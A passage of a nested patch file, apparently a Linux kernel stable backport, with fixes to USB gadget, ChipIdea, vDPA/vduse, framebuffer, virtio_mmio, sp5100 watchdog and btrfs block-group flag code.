++++ b/drivers/usb/chipidea/ci_hdrc_imx.c
+@@ -70,6 +70,10 @@ static const struct ci_hdrc_imx_platform_flag imx7ulp_usb_data = {
+ 		CI_HDRC_PMQOS,
+ };
+ 
++static const struct ci_hdrc_imx_platform_flag imx8ulp_usb_data = {
++	.flags = CI_HDRC_SUPPORTS_RUNTIME_PM,
++};
++
+ static const struct of_device_id ci_hdrc_imx_dt_ids[] = {
+ 	{ .compatible = "fsl,imx23-usb", .data = &imx23_usb_data},
+ 	{ .compatible = "fsl,imx28-usb", .data = &imx28_usb_data},
+@@ -80,6 +84,7 @@ static const struct of_device_id ci_hdrc_imx_dt_ids[] = {
+ 	{ .compatible = "fsl,imx6ul-usb", .data = &imx6ul_usb_data},
+ 	{ .compatible = "fsl,imx7d-usb", .data = &imx7d_usb_data},
+ 	{ .compatible = "fsl,imx7ulp-usb", .data = &imx7ulp_usb_data},
++	{ .compatible = "fsl,imx8ulp-usb", .data = &imx8ulp_usb_data},
+ 	{ /* sentinel */ }
+ };
+ MODULE_DEVICE_TABLE(of, ci_hdrc_imx_dt_ids);
+diff --git a/drivers/usb/chipidea/usbmisc_imx.c b/drivers/usb/chipidea/usbmisc_imx.c
+index bac0f5458cab9..2318c7906acdb 100644
+--- a/drivers/usb/chipidea/usbmisc_imx.c
++++ b/drivers/usb/chipidea/usbmisc_imx.c
+@@ -135,7 +135,7 @@
+ #define TXVREFTUNE0_MASK		(0xf << 20)
+ 
+ #define MX6_USB_OTG_WAKEUP_BITS (MX6_BM_WAKEUP_ENABLE | MX6_BM_VBUS_WAKEUP | \
+-				 MX6_BM_ID_WAKEUP)
++				 MX6_BM_ID_WAKEUP | MX6SX_BM_DPDM_WAKEUP_EN)
+ 
+ struct usbmisc_ops {
+ 	/* It's called once when probe a usb device */
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index ea2c5b6cde8cd..3c51355ccc94d 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -915,8 +915,11 @@ static void __gs_console_push(struct gs_console *cons)
+ 	}
+ 
+ 	req->length = size;
++
++	spin_unlock_irq(&cons->lock);
+ 	if (usb_ep_queue(ep, req, GFP_ATOMIC))
+ 		req->length = 0;
++	spin_lock_irq(&cons->lock);
+ }
+ 
+ static void gs_console_work(struct work_struct *work)
+diff --git a/drivers/usb/gadget/function/uvc_video.c b/drivers/usb/gadget/function/uvc_video.c
+index dd1c6b2ca7c6f..e81865978299c 100644
+--- a/drivers/usb/gadget/function/uvc_video.c
++++ b/drivers/usb/gadget/function/uvc_video.c
+@@ -386,6 +386,9 @@ static void uvcg_video_pump(struct work_struct *work)
+ 	struct uvc_buffer *buf;
+ 	unsigned long flags;
+ 	int ret;
++	bool buf_int;
++	/* video->max_payload_size is only set when using bulk transfer */
++	bool is_bulk = video->max_payload_size;
+ 
+ 	while (video->ep->enabled) {
+ 		/*
+@@ -408,20 +411,35 @@ static void uvcg_video_pump(struct work_struct *work)
+ 		 */
+ 		spin_lock_irqsave(&queue->irqlock, flags);
+ 		buf = uvcg_queue_head(queue);
+-		if (buf == NULL) {
++
++		if (buf != NULL) {
++			video->encode(req, video, buf);
++			/* Always interrupt for the last request of a video buffer */
++			buf_int = buf->state == UVC_BUF_STATE_DONE;
++		} else if (!(queue->flags & UVC_QUEUE_DISCONNECTED) && !is_bulk) {
++			/*
++			 * No video buffer available; the queue is still connected and
++			 * we're transferring over ISOC. Queue a 0-length request to
++			 * prevent missed ISOC transfers.
++			 */
++			req->length = 0;
++			buf_int = false;
++		} else {
++			/*
++			 * Either queue has been disconnected or no video buffer
++			 * Either the queue has been disconnected or no video buffer
++			 * is available for bulk transfer. Either way, stop processing
++			 */
+ 			spin_unlock_irqrestore(&queue->irqlock, flags);
+ 			break;
+ 		}
+ 
+-		video->encode(req, video, buf);
+-
+ 		/*
+ 		 * With usb3 we have more requests. This will decrease the
+ 		 * interrupt load to a quarter but also catches the corner
+ 		 * cases, which need to be handled.
+ 		 */
+-		if (list_empty(&video->req_free) ||
+-		    buf->state == UVC_BUF_STATE_DONE ||
++		if (list_empty(&video->req_free) || buf_int ||
+ 		    !(video->req_int_count %
+ 		       DIV_ROUND_UP(video->uvc_num_requests, 4))) {
+ 			video->req_int_count = 0;
+@@ -441,8 +459,7 @@ static void uvcg_video_pump(struct work_struct *work)
+ 
+ 		/* Endpoint now owns the request */
+ 		req = NULL;
+-		if (buf->state != UVC_BUF_STATE_DONE)
+-			video->req_int_count++;
++		video->req_int_count++;
+ 	}
+ 
+ 	if (!req)
+@@ -527,4 +544,3 @@ int uvcg_video_init(struct uvc_video *video, struct uvc_device *uvc)
+ 			V4L2_BUF_TYPE_VIDEO_OUTPUT, &video->mutex);
+ 	return 0;
+ }
+-
+diff --git a/drivers/vdpa/mlx5/core/mlx5_vdpa.h b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+index 25fc4120b618d..b53420e874acb 100644
+--- a/drivers/vdpa/mlx5/core/mlx5_vdpa.h
++++ b/drivers/vdpa/mlx5/core/mlx5_vdpa.h
+@@ -31,6 +31,7 @@ struct mlx5_vdpa_mr {
+ 	struct list_head head;
+ 	unsigned long num_directs;
+ 	unsigned long num_klms;
++	/* state of dvq mr */
+ 	bool initialized;
+ 
+ 	/* serialize mkey creation and destruction */
+@@ -121,6 +122,7 @@ int mlx5_vdpa_handle_set_map(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *io
+ int mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev, struct vhost_iotlb *iotlb,
+ 			unsigned int asid);
+ void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev);
++void mlx5_vdpa_destroy_mr_asid(struct mlx5_vdpa_dev *mvdev, unsigned int asid);
+ 
+ #define mlx5_vdpa_warn(__dev, format, ...)                                                         \
+ 	dev_warn((__dev)->mdev->device, "%s:%d:(pid %d) warning: " format, __func__, __LINE__,     \
+diff --git a/drivers/vdpa/mlx5/core/mr.c b/drivers/vdpa/mlx5/core/mr.c
+index a4d7ee2339fa5..113aac0446de5 100644
+--- a/drivers/vdpa/mlx5/core/mr.c
++++ b/drivers/vdpa/mlx5/core/mr.c
+@@ -491,15 +491,24 @@ static void destroy_user_mr(struct mlx5_vdpa_dev *mvdev, struct mlx5_vdpa_mr *mr
+ 	}
+ }
+ 
+-void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev)
++static void _mlx5_vdpa_destroy_cvq_mr(struct mlx5_vdpa_dev *mvdev, unsigned int asid)
++{
++	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] != asid)
++		return;
++
++	prune_iotlb(mvdev);
++}
++
++static void _mlx5_vdpa_destroy_dvq_mr(struct mlx5_vdpa_dev *mvdev, unsigned int asid)
+ {
+ 	struct mlx5_vdpa_mr *mr = &mvdev->mr;
+ 
+-	mutex_lock(&mr->mkey_mtx);
++	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] != asid)
++		return;
++
+ 	if (!mr->initialized)
+-		goto out;
++		return;
+ 
+-	prune_iotlb(mvdev);
+ 	if (mr->user_mr)
+ 		destroy_user_mr(mvdev, mr);
+ 	else
+@@ -507,45 +516,79 @@ void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev)
+ 
+ 	memset(mr, 0, sizeof(*mr));
+ 	mr->initialized = false;
+-out:
++}
++
++void mlx5_vdpa_destroy_mr_asid(struct mlx5_vdpa_dev *mvdev, unsigned int asid)
++{
++	struct mlx5_vdpa_mr *mr = &mvdev->mr;
++
++	mutex_lock(&mr->mkey_mtx);
++
++	_mlx5_vdpa_destroy_dvq_mr(mvdev, asid);
++	_mlx5_vdpa_destroy_cvq_mr(mvdev, asid);
++
+ 	mutex_unlock(&mr->mkey_mtx);
+ }
+ 
+-static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev,
+-				struct vhost_iotlb *iotlb, unsigned int asid)
++void mlx5_vdpa_destroy_mr(struct mlx5_vdpa_dev *mvdev)
++{
++	mlx5_vdpa_destroy_mr_asid(mvdev, mvdev->group2asid[MLX5_VDPA_CVQ_GROUP]);
++	mlx5_vdpa_destroy_mr_asid(mvdev, mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP]);
++}
++
++static int _mlx5_vdpa_create_cvq_mr(struct mlx5_vdpa_dev *mvdev,
++				    struct vhost_iotlb *iotlb,
++				    unsigned int asid)
++{
++	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] != asid)
++		return 0;
++
++	return dup_iotlb(mvdev, iotlb);
++}
++
++static int _mlx5_vdpa_create_dvq_mr(struct mlx5_vdpa_dev *mvdev,
++				    struct vhost_iotlb *iotlb,
++				    unsigned int asid)
+ {
+ 	struct mlx5_vdpa_mr *mr = &mvdev->mr;
+ 	int err;
+ 
+-	if (mr->initialized)
++	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] != asid)
+ 		return 0;
+ 
+-	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
+-		if (iotlb)
+-			err = create_user_mr(mvdev, iotlb);
+-		else
+-			err = create_dma_mr(mvdev, mr);
++	if (mr->initialized)
++		return 0;
+ 
+-		if (err)
+-			return err;
+-	}
++	if (iotlb)
++		err = create_user_mr(mvdev, iotlb);
++	else
++		err = create_dma_mr(mvdev, mr);
+ 
+-	if (mvdev->group2asid[MLX5_VDPA_CVQ_GROUP] == asid) {
+-		err = dup_iotlb(mvdev, iotlb);
+-		if (err)
+-			goto out_err;
+-	}
++	if (err)
++		return err;
+ 
+ 	mr->initialized = true;
++
++	return 0;
++}
++
++static int _mlx5_vdpa_create_mr(struct mlx5_vdpa_dev *mvdev,
++				struct vhost_iotlb *iotlb, unsigned int asid)
++{
++	int err;
++
++	err = _mlx5_vdpa_create_dvq_mr(mvdev, iotlb, asid);
++	if (err)
++		return err;
++
++	err = _mlx5_vdpa_create_cvq_mr(mvdev, iotlb, asid);
++	if (err)
++		goto out_err;
++
+ 	return 0;
+ 
+ out_err:
+-	if (mvdev->group2asid[MLX5_VDPA_DATAVQ_GROUP] == asid) {
+-		if (iotlb)
+-			destroy_user_mr(mvdev, mr);
+-		else
+-			destroy_dma_mr(mvdev, mr);
+-	}
++	_mlx5_vdpa_destroy_dvq_mr(mvdev, asid);
+ 
+ 	return err;
+ }
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index daac3ab314785..bf99654371b35 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -2406,7 +2406,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
+ 		goto err_mr;
+ 
+ 	teardown_driver(ndev);
+-	mlx5_vdpa_destroy_mr(mvdev);
++	mlx5_vdpa_destroy_mr_asid(mvdev, asid);
+ 	err = mlx5_vdpa_create_mr(mvdev, iotlb, asid);
+ 	if (err)
+ 		goto err_mr;
+@@ -2422,7 +2422,7 @@ static int mlx5_vdpa_change_map(struct mlx5_vdpa_dev *mvdev,
+ 	return 0;
+ 
+ err_setup:
+-	mlx5_vdpa_destroy_mr(mvdev);
++	mlx5_vdpa_destroy_mr_asid(mvdev, asid);
+ err_mr:
+ 	return err;
+ }
+diff --git a/drivers/vdpa/vdpa.c b/drivers/vdpa/vdpa.c
+index febdc99b51a7b..908b3f98ecbee 100644
+--- a/drivers/vdpa/vdpa.c
++++ b/drivers/vdpa/vdpa.c
+@@ -1172,44 +1172,41 @@ static const struct nla_policy vdpa_nl_policy[VDPA_ATTR_MAX + 1] = {
+ 	[VDPA_ATTR_MGMTDEV_DEV_NAME] = { .type = NLA_STRING },
+ 	[VDPA_ATTR_DEV_NAME] = { .type = NLA_STRING },
+ 	[VDPA_ATTR_DEV_NET_CFG_MACADDR] = NLA_POLICY_ETH_ADDR,
++	[VDPA_ATTR_DEV_NET_CFG_MAX_VQP] = { .type = NLA_U16 },
+ 	/* virtio spec 1.1 section 5.1.4.1 for valid MTU range */
+ 	[VDPA_ATTR_DEV_NET_CFG_MTU] = NLA_POLICY_MIN(NLA_U16, 68),
++	[VDPA_ATTR_DEV_QUEUE_INDEX] = { .type = NLA_U32 },
++	[VDPA_ATTR_DEV_FEATURES] = { .type = NLA_U64 },
+ };
+ 
+ static const struct genl_ops vdpa_nl_ops[] = {
+ 	{
+ 		.cmd = VDPA_CMD_MGMTDEV_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_mgmtdev_get_doit,
+ 		.dumpit = vdpa_nl_cmd_mgmtdev_get_dumpit,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_NEW,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_add_set_doit,
+ 		.flags = GENL_ADMIN_PERM,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_DEL,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_del_set_doit,
+ 		.flags = GENL_ADMIN_PERM,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_get_doit,
+ 		.dumpit = vdpa_nl_cmd_dev_get_dumpit,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_CONFIG_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_config_get_doit,
+ 		.dumpit = vdpa_nl_cmd_dev_config_get_dumpit,
+ 	},
+ 	{
+ 		.cmd = VDPA_CMD_DEV_VSTATS_GET,
+-		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
+ 		.doit = vdpa_nl_cmd_dev_stats_get_doit,
+ 		.flags = GENL_ADMIN_PERM,
+ 	},
+diff --git a/drivers/vdpa/vdpa_user/vduse_dev.c b/drivers/vdpa/vdpa_user/vduse_dev.c
+index 72f924ec4658d..edcd74cc4c0f7 100644
+--- a/drivers/vdpa/vdpa_user/vduse_dev.c
++++ b/drivers/vdpa/vdpa_user/vduse_dev.c
+@@ -899,10 +899,10 @@ static void vduse_dev_irq_inject(struct work_struct *work)
+ {
+ 	struct vduse_dev *dev = container_of(work, struct vduse_dev, inject);
+ 
+-	spin_lock_irq(&dev->irq_lock);
++	spin_lock_bh(&dev->irq_lock);
+ 	if (dev->config_cb.callback)
+ 		dev->config_cb.callback(dev->config_cb.private);
+-	spin_unlock_irq(&dev->irq_lock);
++	spin_unlock_bh(&dev->irq_lock);
+ }
+ 
+ static void vduse_vq_irq_inject(struct work_struct *work)
+@@ -910,10 +910,10 @@ static void vduse_vq_irq_inject(struct work_struct *work)
+ 	struct vduse_virtqueue *vq = container_of(work,
+ 					struct vduse_virtqueue, inject);
+ 
+-	spin_lock_irq(&vq->irq_lock);
++	spin_lock_bh(&vq->irq_lock);
+ 	if (vq->ready && vq->cb.callback)
+ 		vq->cb.callback(vq->cb.private);
+-	spin_unlock_irq(&vq->irq_lock);
++	spin_unlock_bh(&vq->irq_lock);
+ }
+ 
+ static int vduse_dev_queue_irq_work(struct vduse_dev *dev,
+diff --git a/drivers/video/aperture.c b/drivers/video/aperture.c
+index 41e77de1ea82c..5c94abdb1ad6d 100644
+--- a/drivers/video/aperture.c
++++ b/drivers/video/aperture.c
+@@ -332,15 +332,16 @@ int aperture_remove_conflicting_pci_devices(struct pci_dev *pdev, const char *na
+ 	primary = pdev->resource[PCI_ROM_RESOURCE].flags & IORESOURCE_ROM_SHADOW;
+ #endif
+ 
++	if (primary)
++		sysfb_disable();
++
+ 	for (bar = 0; bar < PCI_STD_NUM_BARS; ++bar) {
+ 		if (!(pci_resource_flags(pdev, bar) & IORESOURCE_MEM))
+ 			continue;
+ 
+ 		base = pci_resource_start(pdev, bar);
+ 		size = pci_resource_len(pdev, bar);
+-		ret = aperture_remove_conflicting_devices(base, size, primary, name);
+-		if (ret)
+-			return ret;
++		aperture_detach_devices(base, size);
+ 	}
+ 
+ 	/*
+diff --git a/drivers/video/fbdev/hyperv_fb.c b/drivers/video/fbdev/hyperv_fb.c
+index 4ff25dfc865d9..d3d643cf7506c 100644
+--- a/drivers/video/fbdev/hyperv_fb.c
++++ b/drivers/video/fbdev/hyperv_fb.c
+@@ -995,13 +995,10 @@ static int hvfb_getmem(struct hv_device *hdev, struct fb_info *info)
+ 	struct pci_dev *pdev  = NULL;
+ 	void __iomem *fb_virt;
+ 	int gen2vm = efi_enabled(EFI_BOOT);
++	resource_size_t base, size;
+ 	phys_addr_t paddr;
+ 	int ret;
+ 
+-	info->apertures = alloc_apertures(1);
+-	if (!info->apertures)
+-		return -ENOMEM;
+-
+ 	if (!gen2vm) {
+ 		pdev = pci_get_device(PCI_VENDOR_ID_MICROSOFT,
+ 			PCI_DEVICE_ID_HYPERV_VIDEO, NULL);
+@@ -1010,8 +1007,8 @@ static int hvfb_getmem(struct hv_device *hdev, struct fb_info *info)
+ 			return -ENODEV;
+ 		}
+ 
+-		info->apertures->ranges[0].base = pci_resource_start(pdev, 0);
+-		info->apertures->ranges[0].size = pci_resource_len(pdev, 0);
++		base = pci_resource_start(pdev, 0);
++		size = pci_resource_len(pdev, 0);
+ 
+ 		/*
+ 		 * For Gen 1 VM, we can directly use the contiguous memory
+@@ -1034,8 +1031,8 @@ static int hvfb_getmem(struct hv_device *hdev, struct fb_info *info)
+ 		}
+ 		pr_info("Unable to allocate enough contiguous physical memory on Gen 1 VM. Using MMIO instead.\n");
+ 	} else {
+-		info->apertures->ranges[0].base = screen_info.lfb_base;
+-		info->apertures->ranges[0].size = screen_info.lfb_size;
++		base = screen_info.lfb_base;
++		size = screen_info.lfb_size;
+ 	}
+ 
+ 	/*
+@@ -1077,9 +1074,7 @@ static int hvfb_getmem(struct hv_device *hdev, struct fb_info *info)
+ 	info->screen_size = dio_fb_size;
+ 
+ getmem_done:
+-	aperture_remove_conflicting_devices(info->apertures->ranges[0].base,
+-					    info->apertures->ranges[0].size,
+-					    false, KBUILD_MODNAME);
++	aperture_remove_conflicting_devices(base, size, false, KBUILD_MODNAME);
+ 
+ 	if (gen2vm) {
+ 		/* framebuffer is reallocated, clear screen_info to avoid misuse from kexec */
+diff --git a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+index 51fbf02a03430..76b50b6c98ad9 100644
+--- a/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
++++ b/drivers/video/fbdev/mmp/hw/mmp_ctrl.c
+@@ -519,7 +519,9 @@ static int mmphw_probe(struct platform_device *pdev)
+ 			      "unable to get clk %s\n", mi->clk_name);
+ 		goto failed;
+ 	}
+-	clk_prepare_enable(ctrl->clk);
++	ret = clk_prepare_enable(ctrl->clk);
++	if (ret)
++		goto failed;
+ 
+ 	/* init global regs */
+ 	ctrl_set_default(ctrl);
+diff --git a/drivers/virtio/virtio_mmio.c b/drivers/virtio/virtio_mmio.c
+index 3ff746e3f24aa..dec3cba884586 100644
+--- a/drivers/virtio/virtio_mmio.c
++++ b/drivers/virtio/virtio_mmio.c
+@@ -590,9 +590,8 @@ static void virtio_mmio_release_dev(struct device *_d)
+ 	struct virtio_device *vdev =
+ 			container_of(_d, struct virtio_device, dev);
+ 	struct virtio_mmio_device *vm_dev = to_virtio_mmio_device(vdev);
+-	struct platform_device *pdev = vm_dev->pdev;
+ 
+-	devm_kfree(&pdev->dev, vm_dev);
++	kfree(vm_dev);
+ }
+ 
+ /* Platform device */
+@@ -603,7 +602,7 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 	unsigned long magic;
+ 	int rc;
+ 
+-	vm_dev = devm_kzalloc(&pdev->dev, sizeof(*vm_dev), GFP_KERNEL);
++	vm_dev = kzalloc(sizeof(*vm_dev), GFP_KERNEL);
+ 	if (!vm_dev)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/watchdog/sp5100_tco.c b/drivers/watchdog/sp5100_tco.c
+index 14f8d8d90920f..2bd3dc25cb030 100644
+--- a/drivers/watchdog/sp5100_tco.c
++++ b/drivers/watchdog/sp5100_tco.c
+@@ -96,7 +96,7 @@ static enum tco_reg_layout tco_reg_layout(struct pci_dev *dev)
+ 	    sp5100_tco_pci->device == PCI_DEVICE_ID_AMD_KERNCZ_SMBUS &&
+ 	    sp5100_tco_pci->revision >= AMD_ZEN_SMBUS_PCI_REV) {
+ 		return efch_mmio;
+-	} else if (dev->vendor == PCI_VENDOR_ID_AMD &&
++	} else if ((dev->vendor == PCI_VENDOR_ID_AMD || dev->vendor == PCI_VENDOR_ID_HYGON) &&
+ 	    ((dev->device == PCI_DEVICE_ID_AMD_HUDSON2_SMBUS &&
+ 	     dev->revision >= 0x41) ||
+ 	    (dev->device == PCI_DEVICE_ID_AMD_KERNCZ_SMBUS &&
+@@ -579,6 +579,8 @@ static const struct pci_device_id sp5100_tco_pci_tbl[] = {
+ 	  PCI_ANY_ID, },
+ 	{ PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_KERNCZ_SMBUS, PCI_ANY_ID,
+ 	  PCI_ANY_ID, },
++	{ PCI_VENDOR_ID_HYGON, PCI_DEVICE_ID_AMD_KERNCZ_SMBUS, PCI_ANY_ID,
++	  PCI_ANY_ID, },
+ 	{ 0, },			/* End of list */
+ };
+ MODULE_DEVICE_TABLE(pci, sp5100_tco_pci_tbl);
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 3495bc775afa3..08017b180a10d 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1533,6 +1533,10 @@ void btrfs_mark_bg_unused(struct btrfs_block_group *bg)
+ 		btrfs_get_block_group(bg);
+ 		trace_btrfs_add_unused_block_group(bg);
+ 		list_add_tail(&bg->bg_list, &fs_info->unused_bgs);
++	} else if (!test_bit(BLOCK_GROUP_FLAG_NEW, &bg->runtime_flags)) {
++		/* Pull out the block group from the reclaim_bgs list. */
++		trace_btrfs_add_unused_block_group(bg);
++		list_move_tail(&bg->bg_list, &fs_info->unused_bgs);
+ 	}
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ }
+@@ -2493,6 +2497,7 @@ void btrfs_create_pending_block_groups(struct btrfs_trans_handle *trans)
+ next:
+ 		btrfs_delayed_refs_rsv_release(fs_info, 1);
+ 		list_del_init(&block_group->bg_list);
++		clear_bit(BLOCK_GROUP_FLAG_NEW, &block_group->runtime_flags);
+ 	}
+ 	btrfs_trans_release_chunk_metadata(trans);
+ }
+@@ -2532,6 +2537,13 @@ struct btrfs_block_group *btrfs_make_block_group(struct btrfs_trans_handle *tran
+ 	if (!cache)
+ 		return ERR_PTR(-ENOMEM);
+ 
++	/*
++	 * Mark it as new before adding it to the rbtree of block groups or any
++	 * list, so that no other task finds it and calls btrfs_mark_bg_unused()
++	 * before the new flag is set.
++	 */
++	set_bit(BLOCK_GROUP_FLAG_NEW, &cache->runtime_flags);
++
+ 	cache->length = size;
+ 	set_free_space_tree_thresholds(cache);
+ 	cache->used = bytes_used;
+@@ -2540,7 +2552,7 @@ struct btrfs_block_group *btrfs_make_block_group(struct btrfs_trans_handle *tran
+ 	cache->global_root_id = calculate_global_root_id(fs_info, cache->start);
+ 
+ 	if (btrfs_fs_compat_ro(fs_info, FREE_SPACE_TREE))
+-		cache->needs_free_space = 1;
++		set_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &cache->runtime_flags);
+ 
+ 	ret = btrfs_load_block_group_zone_info(cache, true);
+ 	if (ret) {
+diff --git a/fs/btrfs/block-group.h b/fs/btrfs/block-group.h
+index debd42aeae0f1..47a2dcbfee255 100644
+--- a/fs/btrfs/block-group.h
++++ b/fs/btrfs/block-group.h
+@@ -55,6 +55,15 @@ enum btrfs_block_group_flags {
+ 	BLOCK_GROUP_FLAG_CHUNK_ITEM_INSERTED,
+ 	BLOCK_GROUP_FLAG_ZONE_IS_ACTIVE,
+ 	BLOCK_GROUP_FLAG_ZONED_DATA_RELOC,
++	/* Does the block group need to be added to the free space tree? */
++	BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE,
++	/* Indicate that the block group is placed on a sequential zone */
++	BLOCK_GROUP_FLAG_SEQUENTIAL_ZONE,
++	/*
++	 * Indicate that the block group is in the list of new block groups of a
++	 * transaction.
++	 */
++	BLOCK_GROUP_FLAG_NEW,
+ };
+ 
+ enum btrfs_caching_type {
+@@ -204,15 +213,6 @@ struct btrfs_block_group {
+ 	/* Lock for free space tree operations. */
+ 	struct mutex free_space_lock;
+ 
+-	/*
+-	 * Does the block group need to be added to the free space tree?
+-	 * Protected by free_space_lock.
+-	 */
+-	int needs_free_space;
+-
+-	/* Flag indicating this block group is placed on a sequential zone */
+-	bool seq_zone;
+-
+ 	/*
+ 	 * Number of extents in this block group used for swap files.
+ 	 * All accesses protected by the spinlock 'lock'.
+diff --git a/fs/btrfs/extent_map.c b/fs/btrfs/extent_map.c
+index 4abbe4b352533..56d7580fdc3c4 100644
+--- a/fs/btrfs/extent_map.c
++++ b/fs/btrfs/extent_map.c
+@@ -784,8 +784,6 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 
+ 		if (skip_pinned && test_bit(EXTENT_FLAG_PINNED, &em->flags)) {
+ 			start = em_end;
+-			if (end != (u64)-1)
+-				len = start + len - em_end;
+ 			goto next;
+ 		}
+ 
+@@ -853,8 +851,8 @@ void btrfs_drop_extent_map_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 				if (!split)
+ 					goto remove_em;
+ 			}
+-			split->start = start + len;
+-			split->len = em_end - (start + len);
++			split->start = end;
++			split->len = em_end - end;
+ 			split->block_start = em->block_start;
+ 			split->flags = flags;
+ 			split->compress_type = em->compress_type;
+diff --git a/fs/btrfs/free-space-tree.c b/fs/btrfs/free-space-tree.c
+index a207db9322264..6a44733a95e1c 100644
+--- a/fs/btrfs/free-space-tree.c
++++ b/fs/btrfs/free-space-tree.c
+@@ -803,7 +803,7 @@ int __remove_from_free_space_tree(struct btrfs_trans_handle *trans,
+ 	u32 flags;
+ 	int ret;
+ 
+-	if (block_group->needs_free_space) {
++	if (test_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags)) {
+ 		ret = __add_block_group_free_space(trans, block_group, path);
+ 		if (ret)
+ 			return ret;
+@@ -996,7 +996,7 @@ int __add_to_free_space_tree(struct btrfs_trans_handle *trans,
+ 	u32 flags;
+ 	int ret;
+ 
+-	if (block_group->needs_free_space) {
++	if (test_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags)) {
+ 		ret = __add_block_group_free_space(trans, block_group, path);
+ 		if (ret)
+ 			return ret;
+@@ -1350,7 +1350,7 @@ static int __add_block_group_free_space(struct btrfs_trans_handle *trans,
+ {
+ 	int ret;
+ 
+-	block_group->needs_free_space = 0;
++	clear_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags);
+ 
+ 	ret = add_new_free_space_info(trans, block_group, path);
+ 	if (ret)
+@@ -1372,7 +1372,7 @@ int add_block_group_free_space(struct btrfs_trans_handle *trans,
+ 		return 0;
+ 
+ 	mutex_lock(&block_group->free_space_lock);
+-	if (!block_group->needs_free_space)
++	if (!test_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags))
+ 		goto out;
+ 
+ 	path = btrfs_alloc_path();
+@@ -1405,7 +1405,7 @@ int remove_block_group_free_space(struct btrfs_trans_handle *trans,
+ 	if (!btrfs_fs_compat_ro(trans->fs_info, FREE_SPACE_TREE))
+ 		return 0;
+ 
+-	if (block_group->needs_free_space) {
++	if (test_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &block_group->runtime_flags)) {
+ 		/* We never added this block group to the free space tree. */
+ 		return 0;
+ 	}
+diff --git a/fs/btrfs/tests/free-space-tree-tests.c b/fs/btrfs/tests/free-space-tree-tests.c
+index 13734ed43bfcb..766117a76d742 100644
+--- a/fs/btrfs/tests/free-space-tree-tests.c
++++ b/fs/btrfs/tests/free-space-tree-tests.c
+@@ -470,7 +470,7 @@ static int run_test(test_func_t test_func, int bitmaps, u32 sectorsize,
+ 	}
+ 	cache->bitmap_low_thresh = 0;
+ 	cache->bitmap_high_thresh = (u32)-1;
+-	cache->needs_free_space = 1;
++	set_bit(BLOCK_GROUP_FLAG_NEEDS_FREE_SPACE, &cache->runtime_flags);
+ 	cache->fs_info = root->fs_info;
+ 
+ 	btrfs_init_dummy_trans(&trans, root->fs_info);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 2e0832d70406c..567c5c010f931 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -4652,8 +4652,7 @@ int btrfs_cancel_balance(struct btrfs_fs_info *fs_info)
+ 		}
+ 	}
+ 
+-	BUG_ON(fs_info->balance_ctl ||
+-		test_bit(BTRFS_FS_BALANCE_RUNNING, &fs_info->flags));
++	ASSERT(!test_bit(BTRFS_FS_BALANCE_RUNNING, &fs_info->flags));
+ 	atomic_dec(&fs_info->balance_cancel_req);
+ 	mutex_unlock(&fs_info->balance_mutex);
